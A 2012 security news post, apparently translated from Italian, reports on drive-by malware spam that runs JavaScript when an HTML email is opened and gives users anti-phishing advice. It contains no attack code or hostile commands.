New Drive-By Malware Spam Infects Upon Opening Email

Wednesday, February 01, 2012

Plagiarist Paganini


(Translated from the original Italian)

The threat is a customized attacks that uses email as a vector for spreading the malware.

Until now, we have observed the typical scenario for the contagion requires an unsuspecting user to click on a link in the body of an email to start downloading the malware or to open the agent that is directly attached to the email.

Unfortunately that isn't the only way to infect remote PC, as attackers have developed a new way to infect your system through email without requiring any action from the user. 

According the announcement from researchers at Eleven, a German security firm, it is sufficient that a communication is merely opened in the email client to infect the target without the user clicking on a link or opening an attachment. 

Eleven researchers said that a new malware attack uses JavaScript in HTML email and doesn’t require user interaction to become infected. Once the email is opened and the HTML is displayed, the malware attempts to scan the user’s computer and download the malware while displaying a “Loading… please wait,” message.

The researchers say that the mechanism is the same used to infect PC while users when opening an infected web site in their browser. The easiest way to avoid this malware spam attack is to deactivate display of HTML emails in your account:

"This is similar to so-called drive-by downloads, which infect a PC by opening an infected website in the browser."

The "drive-by spam" attacks observed are using email with the common subject header "Banking Security Update" and a sender address with the domain If the email client allows HTML emails to be displayed, the HTML code is immediately activated.

If you receive an email with the subject, “Banking Security Update,” or a similar message, you must take every precaution before opening open it at all, and it is suggested you choose the option of displaying emails in pure-text format only to avoid any problems.

The increasing use of email makes it much harder to detect whether an email is legitimate or counterfeit, and we must take care in that with the introduction of the IPv6 blacklist-based anti-spam solutions, they will become nearly obsolete.

According to eleven, “The significant expansion of the address space allows for the use of throwaway addresses, which will be used only once for spamming.”

The blacklist concept is based on the possibility to identify those addresses used several times for a spamming purpose, but the IPv6 concept is not applicable due to the wide number of options in term of addresses given to the attackers.

What are the simple rules to follow to avoid being the victim of this type of fraud?

Ignore e-mails that ask for confidential data!

In general, banks, credit card companies and online payment services do not make e-mails that link to a page on which you should enter your account information. Delete the e-mail immediately and do not click on the link! Merely visiting the site may lead to an infection with a virus or or Trojan (a drive-by download).

Check whether the site is secure! 

Check to see where the link actually leads before clicking.

Pay attention to the exact spelling of the URL! 

Always make sure that the URL is correct (even in e-mail sender header) and check it for spelling errors! Also check that the URL is the one the company normally uses (by comparison with the site or with real e-mail).

Not only account and credit card phishing is dangerous!

Alleged e-mails from Facebook or Hotmail can be just as dangerous as those from your bank.


Cross-posted from Security Affairs

Possibly Related Articles:
Infosec Island Viruses & Malware
Information Security
Email Phishing SPAM scams malware Javascript Attack HTML Typosquatting IPv6 trojan FDIC Drive By Black Listing Pierluigi Paganini
Post Rating I Like this!
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.